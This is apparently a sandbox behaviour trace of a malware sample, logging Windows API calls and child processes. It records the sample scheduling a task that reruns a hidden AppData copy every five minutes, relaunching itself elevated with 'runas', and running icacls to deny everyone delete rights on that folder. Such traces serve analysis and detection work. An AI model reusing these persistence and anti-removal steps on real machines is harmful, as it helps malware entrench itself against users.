IIdleSettings:put_WaitTimeout (This=0x29f0d68, WaitTimeout="PT5M") returned 0x0 [0100.100] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x32f93a8 | out: hHeap=0x6f0000) returned 1 [0100.100] IUnknown:Release (This=0x29f0d68) returned 0x1 [0100.100] ITaskDefinition:get_Triggers (in: This=0x29f0b88, ppTriggers=0x18df1c | out: ppTriggers=0x18df1c*=0x29f0cb8) returned 0x0 [0100.100] ITriggerCollection:Create (in: This=0x29f0cb8, Type=1, ppTrigger=0x18df28 | out: ppTrigger=0x18df28*=0x29f0e38) returned 0x0 [0100.100] IUnknown:Release (This=0x29f0cb8) returned 0x1 [0100.101] IUnknown:QueryInterface (in: This=0x29f0e38, riid=0x4d50ec*(Data1=0xb45747e0, Data2=0xeba7, Data3=0x4276, Data4=([0]=0x9f, [1]=0x29, [2]=0x85, [3]=0xc5, [4]=0xbb, [5]=0x30, [6]=0x0, [7]=0x6)), ppvObject=0x18df44 | out: ppvObject=0x18df44*=0x29f0e38) returned 0x0 [0100.101] IUnknown:Release (This=0x29f0e38) returned 0x2 [0100.101] ITrigger:get_Repetition (in: This=0x29f0e38, ppRepeat=0x18df30 | out: ppRepeat=0x18df30*=0x29f0e88) returned 0x0 [0100.101] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xc) returned 0x32f93a8 [0100.101] IRepetitionPattern:put_Interval (This=0x29f0e88, Interval="PT5M") returned 0x0 [0100.101] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x32f93a8 | out: hHeap=0x6f0000) returned 1 [0100.101] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xc) returned 0x32f93a8 [0100.101] IRepetitionPattern:put_Duration (This=0x29f0e88, Duration="") returned 0x0 [0100.103] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x32f93a8 | out: hHeap=0x6f0000) returned 1 [0100.104] ITrigger:put_Repetition (This=0x29f0e38, Repetition=0x29f0e88) returned 0x0 [0100.104] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xc) returned 0x32f93a8 [0100.104] ITrigger:put_Id (This=0x29f0e38, Id="Trigger1") returned 0x0 [0100.105] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x32f93a8 | out: hHeap=0x6f0000) returned 1 [0100.105] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xc) returned 0x32f93a8 [0100.105] ITrigger:put_EndBoundary (This=0x29f0e38, EndBoundary="2030-05-02T08:00:00") returned 0x0 [0100.105] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x32f93a8 | out: hHeap=0x6f0000) returned 1 [0100.105] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18da04 | out: lpSystemTimeAsFileTime=0x18da04*(dwLowDateTime=0x952427a0, dwHighDateTime=0x1d5d833)) [0100.125] GetLastError () returned 0x0 [0100.144] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x24) returned 0x33390a0 [0100.167] GetLastError () returned 0x0 [0100.175] GetLastError () returned 0x0 [0100.184] GetLastError () returned 0x0 [0100.192] GetTimeZoneInformation (in: lpTimeZoneInformation=0x511078 | out: lpTimeZoneInformation=0x511078) returned 0x2 [0100.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="AUS Eastern Standard Time", cchWideChar=-1, lpMultiByteStr=0x50af80, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x18d96c | out: lpMultiByteStr="AUS Eastern Standard Time", lpUsedDefaultChar=0x18d96c) returned 26 [0100.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="AUS Eastern Daylight Time", cchWideChar=-1, lpMultiByteStr=0x50afc0, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x18d96c | out: lpMultiByteStr="AUS Eastern Daylight Time", lpUsedDefaultChar=0x18d96c) returned 26 [0100.236] GetLastError () returned 0x0 [0100.236] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x24) returned 0x3338f20 [0100.236] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5000b8, cbMultiByte=-1, lpWideCharStr=0x3338f20, cchWideChar=18 | out: lpWideCharStr="%Y-%m-%dT%H:%M:%S") returned 18 [0100.237] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xa0) returned 0x32b9340 [0100.237] GetLastError () returned 0x0 [0100.245] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x20) returned 0x333ae38 [0100.254] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x826) returned 0x33049d0 [0100.254] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x333ae38, cbMultiByte=-1, lpWideCharStr=0x33049d0, cchWideChar=1043 | out: lpWideCharStr="2020-02-01T00:00:43") returned 20 [0100.262] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x830) returned 0x3305200 [0100.263] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x33049d0 | out: hHeap=0x6f0000) returned 1 [0100.263] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x333ae38 | out: hHeap=0x6f0000) returned 1 [0100.263] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xc) returned 0x32f93a8 [0100.263] ITrigger:put_StartBoundary (This=0x29f0e38, StartBoundary="2020-02-01T00:00:43") returned 0x0 [0100.263] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x32f93a8 | out: hHeap=0x6f0000) returned 1 [0100.263] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x3305200 | out: hHeap=0x6f0000) returned 1 [0100.263] IUnknown:Release (This=0x29f0e38) returned 0x1 [0100.263] ITaskDefinition:get_Actions (in: This=0x29f0b88, ppActions=0x18df38 | out: ppActions=0x18df38*=0x29f0c00) returned 0x0 [0100.263] IActionCollection:Create (in: This=0x29f0c00, Type=0, ppAction=0x18df24 | out: ppAction=0x18df24*=0x29f0ec0) returned 0x0 [0100.265] IUnknown:Release (This=0x29f0c00) returned 0x1 [0100.265] IUnknown:QueryInterface (in: This=0x29f0ec0, riid=0x4d511c*(Data1=0x4c3d624d, Data2=0xfd6b, Data3=0x49a3, Data4=([0]=0xb9, [1]=0xb7, [2]=0x9, [3]=0xcb, [4]=0x3c, [5]=0xd3, [6]=0xf0, [7]=0x47)), ppvObject=0x18df40 | out: ppvObject=0x18df40*=0x29f0ec0) returned 0x0 [0100.265] IUnknown:Release (This=0x29f0ec0) returned 0x2 [0100.265] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xc) returned 0x32f93a8 [0100.265] IExecAction:put_Path (This=0x29f0ec0, Path="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\96cfdb85-ccb7-4261-9c45-a19b18c734ac\\YTHGRFED.EXE.exe") returned 0x0 [0100.265] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x32f93a8 | out: hHeap=0x6f0000) returned 1 [0100.265] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xc) returned 0x32f93a8 [0100.265] IExecAction:put_Arguments (This=0x29f0ec0, Arguments="--Task") returned 0x0 [0100.265] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x32f93a8 | out: hHeap=0x6f0000) returned 1 [0100.265] IUnknown:Release (This=0x29f0ec0) returned 0x1 [0100.265] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0xc) returned 0x32f93a8 [0100.265] ITaskFolder:RegisterTaskDefinition (in: This=0x30ff98, Path="Time Trigger Task", pDefinition=0x29f0b88, flags=6, UserId=0x18d9e0*(varType=0x0, wReserved1=0x330, wReserved2=0xdef4, wReserved3=0x18, varVal1=0x420cab, varVal2=0x6f0000), password=0x18d9f0*(varType=0x0, wReserved1=0x0, wReserved2=0xd0, wReserved3=0x0, varVal1=0x67, varVal2=0x7), LogonType=3, sddl=0x18da04*(varType=0x8, wReserved1=0x0, wReserved2=0x2, wReserved3=0x0, varVal1="", varVal2=0xd8), ppTask=0x18df0c | out: ppTask=0x18df0c*=0x29f0f30) returned 0x0 [0100.561] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x32f93a8 | out: hHeap=0x6f0000) returned 1 [0100.561] TaskScheduler:IUnknown:Release (This=0x30ff98) returned 0x0 [0100.561] TaskScheduler:IUnknown:Release (This=0x29f0b88) returned 0x0 [0100.561] IUnknown:Release (This=0x29f0f30) returned 0x0 [0100.561] CoUninitialize () [0100.568] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x32ad5b8 | out: hHeap=0x6f0000) returned 1 [0100.568] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x32ad330 | out: hHeap=0x6f0000) returned 1 [0100.577] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x32ad258 | out: hHeap=0x6f0000) returned 1 [0100.577] GetVersion () returned 0x1db10106 [0100.577] lstrcpyW (in: lpString1=0x18e370, lpString2="--Admin" | out: lpString1="--Admin") returned="--Admin" [0100.577] lstrcatW (in: lpString1="--Admin", lpString2=" IsNotAutoStart" | out: lpString1="--Admin IsNotAutoStart") returned="--Admin IsNotAutoStart" [0100.578] lstrcatW (in: lpString1="--Admin IsNotAutoStart", lpString2=" IsNotTask" | out: lpString1="--Admin IsNotAutoStart IsNotTask") returned="--Admin IsNotAutoStart IsNotTask" [0100.578] ShellExecuteExW (in: pExecInfo=0x18e134*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb="runas", lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YTHGRFED.EXE.exe", lpParameters="--Admin IsNotAutoStart IsNotTask", lpDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nShow=5, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x18e134*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb="runas", lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YTHGRFED.EXE.exe", lpParameters="--Admin IsNotAutoStart IsNotTask", lpDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nShow=5, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0101.179] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x32b26b0 | out: hHeap=0x6f0000) returned 1 [0101.180] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x32ad0a8 | out: hHeap=0x6f0000) returned 1 [0101.180] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x74c658 | out: hHeap=0x6f0000) returned 1 [0101.254] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x742c10 | out: hHeap=0x6f0000) returned 1 [0101.254] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x70e1b8 | out: hHeap=0x6f0000) returned 1 [0101.254] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x330c790 | out: hHeap=0x6f0000) returned 1 [0101.254] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x330be98 | out: hHeap=0x6f0000) returned 1 [0101.263] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x711408 | out: hHeap=0x6f0000) returned 1 [0101.310] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x70fff0 | out: hHeap=0x6f0000) returned 1 [0101.311] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18f3fc | out: phModule=0x18f3fc) returned 0 [0101.311] ExitProcess (uExitCode=0x0) [0101.355] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x33390a0 | out: hHeap=0x6f0000) returned 1 [0101.356] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x70ed80 | out: hHeap=0x6f0000) returned 1 [0101.399] TerminateProcess (hProcess=0xffffffff, uExitCode=0x0) Thread: id = 2 os_tid = 0x34c Thread: id = 3 os_tid = 0x67c Thread: id = 4 os_tid = 0x758 Thread: id = 5 os_tid = 0x6f4 Thread: id = 6 os_tid = 0x128 Thread: id = 7 os_tid = 0x7f4 Thread: id = 8 os_tid = 0x68c Thread: id = 22 os_tid = 0x78c Thread: id = 23 os_tid = 0x804 Thread: id = 31 os_tid = 0x864 Process: id = "2" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x9014000" os_pid = "0x3f8" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000db03" [0xc000000f], "LOCAL" [0x7] Thread: id = 9 os_tid = 0x324 Thread: id = 10 os_tid = 0x7c0 Thread: id = 11 os_tid = 0x310 Thread: id = 12 os_tid = 0x7c8 Thread: id = 13 os_tid = 0x6cc Thread: id = 14 os_tid = 0x644 Thread: id = 15 os_tid = 0x63c Thread: id = 16 os_tid = 0x154 Thread: id = 17 os_tid = 0x150 Thread: id = 18 os_tid = 0x120 Thread: id = 19 os_tid = 0x124 Thread: id = 20 os_tid = 0x118 Thread: id = 21 os_tid = 0x3fc Thread: id = 45 os_tid = 0xacc Thread: id = 47 os_tid = 0xb2c Thread: id = 48 os_tid = 0xb3c Thread: id = 49 os_tid = 0x950 Thread: id = 50 os_tid = 0x9c0 Thread: id = 51 os_tid = 0x34c Process: id = "3" image_name = "icacls.exe" filename = "c:\\windows\\syswow64\\icacls.exe" page_root = "0x3252e000" os_pid = "0x824" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x734" cmd_line = "icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\96cfdb85-ccb7-4261-9c45-a19b18c734ac\" /deny *S-1-1-0:(OI)(CI)(DE,DC)" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e6e5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 24 os_tid = 0x834 Thread: id = 25 os_tid = 0x854 Process: id = "4" image_name = "taskeng.exe" filename = "c:\\windows\\system32\\taskeng.exe" page_root = "0x7a9ca000" os_pid = "0x530" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "created_scheduled_job" parent_id = "1" os_parent_pid = "0x370" cmd_line = "taskeng.exe {DAD14AF5-82A5-4514-AFD0-06330000279A} S-1-5-21-3388679973-3930757225-3770151564-1000:XDUWTFONO\\5p5NrGJn0jS HALPmcxz:Interactive:Highest[1]" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e6e5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 26 os_tid = 0x230 Thread: id = 27 os_tid = 0x5b8 Thread: id = 28 os_tid = 0x548 Thread: id = 29 os_tid = 0x53c Thread: id = 30 os_tid = 0x534 Thread: id = 43 os_tid = 0xa5c Thread: id = 44 os_tid = 0xa9c Process: id = "5" image_name = "ythgrfed.exe.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ythgrfed.exe.exe" page_root = "0x339fd000" os_pid = "0x874" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x734" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YTHGRFED.EXE.exe\" --Admin IsNotAutoStart IsNotTask" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e6e5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 32 os_tid = 0x884 [0103.530] GetLastError () returned 0x0 [0103.530] GetACP () returned 0x4e4 [0103.530] GetLastError () returned 0x0 [0103.530] GetACP () returned 0x4e4 [0103.530] GetLastError () returned 0x0 [0103.530] GetACP () returned 0x4e4 [0103.530] GetLastError () returned 0x0 [0103.530] GetACP () returned 0x4e4 [0103.530] GetLastError () returned 0x0 [0103.530] GetACP () returned 0x4e4 [0103.530] GetLastError () returned 0x0 [0103.530] GetACP () returned 0x4e4 [0103.530] GetLastError () returned 0x0 [0103.530] GetACP () returned 0x4e4 [0103.530] GetLastError () returned 0x0 [0103.530] GetACP () returned 0x4e4 [0103.530] GetLastError () returned 0x0 [0103.530] GetACP () returned 0x4e4 [0103.530] GetLastError () returned 0x0 [0103.530] GetACP () returned 0x4e4 [0103.530] GetLastError () returned 0x0 [0103.530] GetACP () returned 0x4e4 [0103.530] GetLastError () returned 0x0 [0103.530] GetACP () returned 0x4e4 [0103.530] GetLastError () returned 0x0 [0103.530] GetACP () returned 0x4e4 [0103.530] GetLastError () returned 0x0 [0103.531] GetACP () returned 0x4e4 [0103.531] GetLastError () returned 0x0 [0103.531] GetACP () returned 0x4e4 [0103.531] GetLastError () returned 0x0 [0103.531] GetACP () returned 0x4e4 [0103.531] GetLastError () returned 0x0 [0103.531] GetACP () returned 0x4e4 [0103.531] GetLastError () returned 0x0 [0103.531] GetACP () returned 0x4e4 [0103.531] GetLastError () returned 0x0 [0103.531] GetACP () returned 0x4e4 [0103.531] GetLastError () returned 0x0 [0103.531] GetACP () returned 0x4e4 [0103.531] GetLastError () returned 0x0 [0103.531] GetACP () returned 0x4e4 [0103.531] GetLastError () returned 0x0 [0103.531] GetACP () returned 0x4e4 [0103.531] GetLastError () returned 0x0 [0103.531] GetACP () returned 0x4e4 [0103.531] GetLastError () returned 0x0 [0103.531] GetACP () returned 0x4e4 [0103.531] GetLastError () returned 0x0 [0103.531] GetACP () returned 0x4e4 [0103.531] GetLastError () returned 0x0 [0103.532] GetACP () returned 0x4e4 [0103.532] GetLastError () returned 0x0 [0103.532] GetACP () returned 0x4e4 [0103.532] GetLastError () returned 0x0 [0103.532] GetACP () returned 0x4e4 [0103.532] GetLastError () returned 0x0 [0103.532] GetACP () returned 0x4e4 [0103.532] GetLastError () returned 0x0 [0103.532] GetACP () returned 0x4e4 [0103.532] GetLastError () returned 0x0 [0103.532] GetACP () returned 0x4e4 [0103.532] GetLastError () returned 0x0 [0103.532] GetACP () returned 0x4e4 [0103.532] GetLastError () returned 0x0 [0103.532] GetACP () returned 0x4e4 [0103.532] GetLastError () returned 0x0 [0103.532] GetACP () returned 0x4e4 [0103.532] GetLastError () returned 0x0 [0103.532] GetACP () returned 0x4e4 [0103.532] GetLastError () returned 0x0 [0103.532] GetACP () returned 0x4e4 [0103.532] GetLastError () returned 0x0 [0103.532] GetACP () returned 0x4e4 [0103.532] GetLastError () returned 0x0 [0103.532] GetACP () returned 0x4e4 [0103.532] GetLastError () returned 0x0 [0103.532] GetACP () returned 0x4e4 [0103.532] GetLastError () returned 0x0 [0103.532] GetACP () returned 0x4e4 [0103.532] GetLastError () returned 0x0 [0103.532] GetACP () returned 0x4e4 [0103.532] GetLastError () returned 0x0 [0103.533] GetACP () returned 0x4e4 [0103.533] GetLastError () returned 0x0 [0103.533] GetACP () returned 0x4e4 [0103.533] GetLastError () returned 0x0 [0103.533] GetACP () returned 0x4e4 [0103.533] GetLastError () returned 0x0 [0103.533] GetACP () returned 0x4e4 [0103.533] GetLastError () returned 0x0 [0103.533] GetACP () returned 0x4e4 [0103.533] GetLastError () returned 0x0 [0103.533] GetACP () returned 0x4e4 [0103.533] GetLastError () returned 0x0 [0103.533] GetACP () returned 0x4e4 [0103.533] GetLastError () returned 0x0 [0103.533] GetACP () returned 0x4e4 [0103.533] GetLastError () returned 0x0 [0103.533] GetACP () returned 0x4e4 [0103.533] GetLastError () returned 0x0 [0103.533] GetACP () returned 0x4e4 [0103.533] GetLastError () returned 0x0 [0103.533] GetACP () returned 0x4e4 [0103.533] GetLastError () returned 0x0 [0103.533] GetACP () returned 0x4e4 [0103.533] GetLastError () returned 0x0 [0103.533] GetACP () returned 0x4e4 [0103.533] GetLastError () returned 0x0 [0103.533] GetACP () returned 0x4e4 [0103.533] GetLastError () returned 0x0 [0103.533] GetACP () returned 0x4e4 [0103.533] GetLastError () returned 0x0 [0103.533] GetACP () returned 0x4e4 [0103.533] GetLastError () returned 0x0 [0103.533] GetACP () returned 0x4e4 [0103.533] GetLastError () returned 0x0 [0103.533] GetACP () returned 0x4e4 [0103.534] GetLastError () returned 0x0 [0103.534] GetACP () returned 0x4e4 [0103.534] GetLastError () returned 0x0 [0103.534] GetACP () returned 0x4e4 [0103.534] GetLastError () returned 0x0 [0103.534] GetACP () returned 0x4e4 [0103.534] GetLastError () returned 0x0 [0103.534] GetACP () returned 0x4e4 [0103.534] GetLastError () returned 0x0 [0103.534] GetACP () returned 0x4e4 [0103.534] GetLastError () returned 0x0 [0103.534] GetACP () returned 0x4e4 [0103.534] GetLastError () returned 0x0 [0103.534] GetACP () returned 0x4e4 [0103.534] GetLastError () returned 0x0 [0103.534] GetACP () returned 0x4e4 [0103.534] GetLastError () returned 0x0 [0103.534] GetACP () returned 0x4e4 [0103.534] GetLastError () returned 0x0 [0103.534] GetACP () returned 0x4e4 [0103.534] GetLastError () returned 0x0 [0103.534] GetACP () returned 0x4e4 [0103.534] GetLastError () returned 0x0 [0103.534] GetACP () returned 0x4e4 [0103.534] GetLastError () returned 0x0 [0103.534] GetACP () returned 0x4e4 [0103.534] GetLastError () returned 0x0 [0103.534] GetACP () returned 0x4e4 [0103.534] GetLastError () returned 0x0 [0103.534] GetACP () returned 0x4e4 [0103.534] GetLastError () returned 0x0 [0103.534] GetACP () returned 0x4e4 [0103.534] GetLastError () returned 0x0 [0103.534] GetACP () returned 0x4e4 [0103.535] GetLastError () returned 0x0 [0103.535] GetACP () returned 0x4e4 [0103.535] GetLastError () returned 0x0 [0103.535] GetACP () returned 0x4e4 [0103.535] GetLastError () returned 0x0 [0103.535] GetACP () returned 0x4e4 [0103.535] GetLastError () returned 0x0 [0103.535] GetACP () returned 0x4e4 [0103.535] GetLastError () returned 0x0 [0103.535] GetACP () returned 0x4e4 [0103.535] GetLastError () returned 0x0 [0103.535] GetACP () returned 0x4e4 [0103.535] GetLastError () returned 0x0 [0103.535] GetACP () returned 0x4e4 [0103.535] GetLastError () returned 0x0 [0103.535] GetACP () returned 0x4e4 [0103.535] GetLastError () returned 0x0 [0103.535] GetACP () returned 0x4e4 [0103.535] GetLastError () returned 0x0 [0103.535] GetACP () returned 0x4e4 [0103.535] GetLastError () returned 0x0 [0103.535] GetACP () returned 0x4e4 [0103.535] GetLastError () returned 0x0 [0103.535] GetACP () returned 0x4e4 [0103.535] GetLastError () returned 0x0 [0103.535] GetACP () returned 0x4e4 [0103.535] GetLastError () returned 0x0 [0103.535] GetACP () returned 0x4e4 [0103.535] GetLastError () returned 0x0 [0103.535] GetACP () returned 0x4e4 [0103.535] GetLastError () returned 0x0 [0103.535] GetACP () returned 0x4e4 [0103.535] GetLastError () returned 0x0 [0103.535] GetACP () returned 0x4e4 [0103.535] GetLastError () returned 0x0 [0103.536] GetACP () returned 0x4e4 [0103.536] GetLastError () returned 0x0 [0103.536] GetACP () returned 0x4e4 [0103.536] GetLastError () returned 0x0 [0103.536] GetACP () returned 0x4e4 [0103.536] GetLastError () returned 0x0 [0103.536] GetACP () returned 0x4e4 [0103.536] GetLastError () returned 0x0 [0103.536] GetACP () returned 0x4e4 [0103.536] GetLastError () returned 0x0 [0103.536] GetACP () returned 0x4e4 [0103.536] GetLastError () returned 0x0 [0103.536] GetACP () returned 0x4e4 [0103.536] GetLastError () returned 0x0 [0103.536] GetACP () returned 0x4e4 [0103.536] GetLastError () returned 0x0 [0103.536] GetACP () returned 0x4e4 [0103.536] GetLastError () returned 0x0 [0103.536] GetACP () returned 0x4e4 [0103.536] GetLastError () returned 0x0 [0103.536] GetACP () returned 0x4e4 [0103.536] GetLastError () returned 0x0 [0103.536] GetACP () returned 0x4e4 [0103.536] GetLastError () returned 0x0 [0103.536] GetACP () returned 0x4e4 [0103.536] GetLastError () returned 0x0 [0103.536] GetACP () returned 0x4e4 [0103.536] GetLastError () returned 0x0 [0103.536] GetACP () returned 0x4e4 [0103.536] GetLastError () returned 0x0 [0103.536] GetACP () returned 0x4e4 [0103.536] GetLastError () returned 0x0 [0103.536] GetACP () returned 0x4e4 [0103.536] GetLastError () returned 0x0 [0103.537] GetACP () returned 0x4e4 [0103.537] GetLastError () returned 0x0 [0103.537] GetACP () returned 0x4e4 [0103.537] GetLastError () returned 0x0 [0103.537] GetACP () returned 0x4e4 [0103.537] GetLastError () returned 0x0 [0103.537] GetACP () returned 0x4e4 [0103.537] GetLastError () returned 0x0 [0103.537] GetACP () returned 0x4e4 [0103.537] GetLastError () returned 0x0 [0103.537] GetACP () returned 0x4e4 [0103.537] GetLastError () returned 0x0 [0103.537] GetACP () returned 0x4e4 [0103.537] GetLastError () returned 0x0 [0103.537] GetACP () returned 0x4e4 [0103.537] GetLastError () returned 0x0 [0103.537] GetACP () returned 0x4e4 [0103.537] GetLastError () returned 0x0 [0103.537] GetACP () returned 0x4e4 [0103.537] GetLastError () returned 0x0 [0103.537] GetACP () returned 0x4e4 [0103.537] GetLastError () returned 0x0 [0103.537] GetACP () returned 0x4e4 [0103.537] GetLastError () returned 0x0 [0103.537] GetACP () returned 0x4e4 [0103.537] GetLastError () returned 0x0 [0103.537] GetACP () returned 0x4e4 [0103.537] GetLastError () returned 0x0 [0103.537] GetACP () returned 0x4e4 [0103.537] GetLastError () returned 0x0 [0103.537] GetACP () returned 0x4e4 [0103.537] GetLastError () returned 0x0 [0103.537] GetACP () returned 0x4e4 [0103.537] GetLastError () returned 0x0 [0103.537] GetACP () returned 0x4e4 [0103.538] GetLastError () returned 0x0 [0103.538] GetACP () returned 0x4e4 [0103.538] GetLastError () returned 0x0 [0103.538] GetACP () returned 0x4e4 [0103.538] GetLastError () returned 0x0 [0103.538] GetACP () returned 0x4e4 [0103.538] GetLastError () returned 0x0 [0103.538] GetACP () returned 0x4e4 [0103.538] GetLastError () returned 0x0 [0103.538] GetACP () returned 0x4e4 [0103.538] GetLastError () returned 0x0 [0103.538] GetACP () returned 0x4e4 [0103.538] GetLastError () returned 0x0 [0103.538] GetACP () returned 0x4e4 [0103.538] GetLastError () returned 0x0 [0103.538] GetACP () returned 0x4e4 [0103.538] GetLastError () returned 0x0 [0103.538] GetACP () returned 0x4e4 [0103.538] GetLastError () returned 0x0 [0103.538] GetACP () returned 0x4e4 [0103.538] GetLastError () returned 0x0 [0103.538] GetACP () returned 0x4e4 [0103.538] GetLastError () returned 0x0 [0103.538] GetACP () returned 0x4e4 [0103.538] GetLastError () returned 0x0 [0103.538] GetACP () returned 0x4e4 [0103.538] GetLastError () returned 0x0 [0103.538] GetACP () returned 0x4e4 [0103.538] GetLastError () returned 0x0 [0103.538] GetACP () returned 0x4e4 [0103.538] GetLastError () returned 0x0 